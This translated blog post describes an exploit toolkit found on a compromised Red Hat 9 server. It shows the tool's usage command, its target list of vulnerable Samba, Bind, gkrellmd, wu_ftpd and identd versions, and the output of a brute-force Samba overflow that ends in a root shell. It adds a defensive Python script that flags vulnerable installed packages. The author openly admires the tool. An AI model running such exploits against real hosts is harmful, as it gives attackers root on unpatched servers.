SoFunction
Updated on 2025-04-08

Demo: getting root through the overflow in the default Samba version on RedHat 9

During a recent security analysis of a hacked server, I found the tool this user used to escalate privileges. He took advantage of a Samba security vulnerability to escalate to ROOT.
A few days ago the server was put on the public network for testing. The next day I found that the server had been hacked.
Samba is the default version on Redhat Linux 9. The hacker's powerful exploit tool was used to escalate to root.
It only takes 3 seconds to escalate to root.
Cold sweat.
I found a directory named x2k3 in the server's tmp:
[bob@learnin9 tmp]$ cd x2k3/
[bob@learnin9 x2k3]$ ls
bind ftp gkr identd r00t samba
[bob@learnin9 x2k3]$ 
bind, ftp, gkr, identd and samba are all directories, and r00t is a program. Let's take a look at what happens when the r00t program is run.
[bob@learnin9 x2k3]$ ./r00t 
.--------------------------------. 
| x2k3 / 
| Written by Natok / 
+------------------------+----.
| Targets: [1] Samba | <= 2.2.8 
| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1 
| [3] gkrellmd | <2.1.12 
| [4] wu_ftpd | <=2.6.1 
| [5] identd | 1.2 
+------------------------+----.
|  /
|____________________________/ 
./r00t 
[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
[*] Range to scan : 127.0.0.0
[*] Socket Connecting to port : 139
[*] Press control+c for skipping ! 
Port 139 IP 127.0.0.0 -> Connection refused!
Port 139 IP 127.0.0.1 -> Connection ok!
[+] Let's sploit ;-)
samba-2.2.8 < remote root exploit by eSDee (|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Using ret: [0xbffff6a0]
+ Using ret: [0xbffff574]
+ Using ret: [0xbffff448]
+ Using ret: [0xbffff31c]
+ Using ret: [0xbffff1f0]
+ Using ret: [0xbffff0c4]
+ Using ret: [0xbfffef98]
+ Using ret: [0xbfffee6c]
+ Using ret: [0xbfffed40]
+ Using ret: [0xbfffec14]
+ Using ret: [0xbfffeae8]
+ Using ret: [0xbfffe9bc]
+ Using ret: [0xbfffe890]
+ Using ret: [0xbfffe764]
+ Using ret: [0xbfffe638]
+ Using ret: [0xbfffe50c]
+ Using ret: [0xbfffe3e0]
+ Using ret: [0xbfffe2b4]
+ Using ret: [0xbfffe188]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
See that? Root was obtained easily.
This is just the localhost method; in fact, root is obtained just as directly from a remote host.
Please take a look at your own Redhat 9: rpm -qa |grep ***  Is the sweat already coming out?
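To make that rpm -qa check repeatable, here is an added example (my addition, not code from the original post or from the x2k3 tool) that parses rpm -qa output and flags packages whose versions fall inside the ranges printed in the r00t target banner above. The package list is constructed sample output, and the rpm names wu-ftpd and identd are assumed to correspond to the banner's wu_ftpd and identd targets.

```python
"""Flag installed RPMs that fall inside the version ranges listed in the r00t banner."""
import re

# Split a version such as "2.2.7a" into comparable parts: numbers compare as
# ints, letter suffixes compare as strings after the numbers.
def _ver_key(v: str):
    parts = re.findall(r"\d+|[a-zA-Z]+", v)
    return [(0, int(p)) if p.isdigit() else (1, p) for p in parts]

def vcmp(a: str, b: str) -> int:
    """Return -1, 0 or 1 as version a is less than, equal to or greater than b."""
    ka, kb = _ver_key(a), _ver_key(b)
    return (ka > kb) - (ka < kb)

# Version bounds exactly as the r00t banner states them.
TARGETS = {
    "samba":    lambda v: vcmp(v, "2.2.8") <= 0,             # <= 2.2.8
    "bind":     lambda v: v in ("8.3.2", "8.3.3", "9.2.1"),  # listed versions
    "gkrellmd": lambda v: vcmp(v, "2.1.12") < 0,             # < 2.1.12
    "wu-ftpd":  lambda v: vcmp(v, "2.6.1") <= 0,             # <= 2.6.1 (rpm name assumed)
    "identd":   lambda v: v == "1.2",                        # 1.2 (rpm name assumed)
}

def parse_nvr(line: str):
    """Split an rpm -qa line "name-version-release" into its three fields, or None."""
    try:
        name, version, release = line.strip().rsplit("-", 2)
    except ValueError:
        return None
    return name.lower(), version, release

def vulnerable_packages(rpm_qa_output: str):
    """Return (name, version) pairs for installed packages inside a banner range."""
    hits = []
    for line in rpm_qa_output.splitlines():
        nvr = parse_nvr(line)
        if nvr is None:
            continue
        name, version, _release = nvr
        check = TARGETS.get(name)
        if check is not None and check(version):
            hits.append((name, version))
    return hits

# Constructed sample of rpm -qa output resembling a Red Hat 9 box (not a real capture).
SAMPLE_RPM_QA = """\
samba-2.2.7a-8.9.0
samba-common-2.2.7a-8.9.0
bind-9.2.1-16
openssh-3.5p1-6
gkrellmd-2.1.14-1
wu-ftpd-2.6.2-8
"""

if __name__ == "__main__":
    for name, version in vulnerable_packages(SAMPLE_RPM_QA):
        print(f"{name}-{version} is inside a range the r00t tool targets")
```

Run it against `rpm -qa` output piped from the host you want to inventory; the sample above flags samba and bind only.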
There are also overflow programs for bind, gkrellmd, wu_ftpd and identd. I don't know whether these are overflow programs that have not yet been published in the hacking scene. hehe!
Because my server did not run Bind, gkrellmd, wu_ftpd or identd, only the default installation of samba, and it was on the public network, the hacker hit the jackpot and hacked into my server. I should congratulate myself: I finally found such a good tool.
A little joy of my own. I went to check it out and found that it was a Chinese website. Who is it? Very curious......
It can be said that the r00t program was written by Natok, but the exploit programs were not written by him. He just collected other people's overflow programs and gave them a friendly interface, but the collection is still very powerful.
Hope to get to know this guy!